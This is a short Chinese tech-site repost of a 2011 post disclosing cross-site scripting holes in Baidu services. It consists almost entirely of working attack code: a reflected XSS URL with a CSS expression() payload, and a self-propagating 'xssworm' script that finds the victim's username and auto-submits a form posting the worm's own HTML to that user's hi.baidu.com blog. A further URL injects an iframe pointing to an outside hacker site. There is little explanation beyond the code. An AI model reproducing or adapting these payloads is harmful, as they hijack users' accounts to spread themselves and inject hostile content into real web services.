知识屋:更实用的电脑技术知识网站
知识屋 手机游戏 手机软件 电脑软件 最近更新 手机端
冒险村物语 英雄无敌3塔防 驾考家园手游
password怎么用?p 诺诺视频会议怎 网易UU网游加速
所在位置:首页 > 网络安全 > 技术文献

百度暴xssworm 跨站 漏洞

发布时间:2011-06-26 04:04:55作者:知识屋

 

 

http://www.baidu.com/index.php?bar=[/url]"/**/style=xss:expression(alert('xss'));


有点死循环的性质,无限弹窗.


<div id="xssworm">.
<form name="form1" id="popFormSubmit" action="" method="post">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" id="url" name="spRefURL" value="">
<input type="hidden" id="title" name="spBlogTitle" value="百度又有新漏洞啦-F14r3">
<input type="hidden" id="content" name="spBlogText" value="">
<input type="hidden" name="spBlogCatName" value="默认分类">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spVcode" value="">
<input type="hidden" name="spVerifyKey" value="">
<input type="hidden" name="tj" value=" 发表文章 " >
</form>
<script>
function $(i){return document.getElementById(i);}
window.onload = function(){
    var j=document.body.innerText;
    var i=j.indexOf("|");
    j=j.substr(0,i);
    form1.action = "http://hi.baidu.com/"+j+"/commit";
    $("content").value = escape($("xssworm").outerHTML);
    form1.submit();
}
</script>
</div>

跨站漏洞:

http://bk.baidu.com/s?wd=</title><iframe%20src=http://www.cnxhacker.com></iframe

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏

上一篇:很抱歉没有了

下一篇:Java applet 安全性探究

知识阅读

软件推荐

更多 >

游戏推荐

更多 >

精选栏目

热门推荐

  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜

手机游戏

手机软件

电脑软件

猜你喜欢

财经 奇迹 卡牌 购物 放置 低息 即时 网贷借钱 三国 360 手机赚钱 经营 直播 小说 办公 模拟 借钱 闯关 教育 魔幻 健康 腾讯 唱歌 彩票 养成 网易 系统 挂机 吃鸡 宫斗 母婴 换装 格斗 西游 抢红包 辅助 拍照 冒险 旅游 英语口语 系统软件 赛车 投注 联机 投屏 角色 竞速 抖音 社交 漫画

本站所有软件来自互联网,版权归原著所有。如有侵权,敬请来信告知,我们将及时撤销。

知识屋 www.zhishiwu.com 更实用的电脑技术知识网站

苏ICP备14019037号-7